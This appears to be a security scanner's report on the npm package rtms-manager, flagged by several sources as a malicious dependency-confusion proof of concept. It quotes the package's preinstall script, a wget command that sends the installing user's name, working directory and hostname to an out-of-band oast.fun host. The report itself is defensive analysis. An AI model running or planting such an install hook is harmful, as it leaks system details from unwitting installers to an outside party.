rtms-manager @1.4.0
Dependency Confusion poc
Maintainers
Risk Dispositions (2 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason | |
|---|---|---|---|---|---|
install-script:preinstall |
install-scripts | reject | AI | AI (install-scripts): Self-described dependency confusion PoC; preinstall executes arbitrary code on install. | |
bogus-package |
bogus-package | reject | AI | AI (bogus-package): Package is explicitly a PoC attack artifact, not a legitimate package. |
SAST Findings (3)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c18da37bf0615d0c7dceb6be7eb89956f39de56bbc90f65d9398fbfb3f9455dc) The package rtms-manager was found to contain malicious code. ## Source: ossf-package-analysis (d50c578dddb4a0cd216dd21c4432a54846daef2a4c41bd80aef2ca6a983dacd5) The OpenSSF Package Analysis project identified 'rtms-manager' @ 1.2.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Script: wget --quiet "http://mymraonjbzjnkkyazwmtobvcuzvdfynr2.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 71. Findings: 1 critical (+40), 1 high (+25), 2 low (+6).
Published to npm: